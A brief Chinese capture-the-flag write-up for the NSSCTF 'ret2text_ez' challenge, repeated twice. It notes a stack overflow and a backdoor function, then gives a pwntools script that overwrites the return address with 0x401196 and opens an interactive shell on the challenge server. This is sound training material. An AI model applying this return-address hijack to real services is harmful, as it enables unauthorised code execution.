2025 SWPU-NSSCTF 秋季招新入门 ret2text_ez
首先查看一下保护措施

再用ida打开看一下

这里存在栈溢出

并且存在后门函数

点击查看代码
from pwn import *
io=remote("node5.anna.nssctf.cn",29375)
backdoor=0x401196
payload=b"A"*(0x20+8)+p64(backdoor)
io.sendline(payload)
io.interactive()
首先查看一下保护措施

再用ida打开看一下

这里存在栈溢出

并且存在后门函数

from pwn import *
io=remote("node5.anna.nssctf.cn",29375)
backdoor=0x401196
payload=b"A"*(0x20+8)+p64(backdoor)
io.sendline(payload)
io.interactive()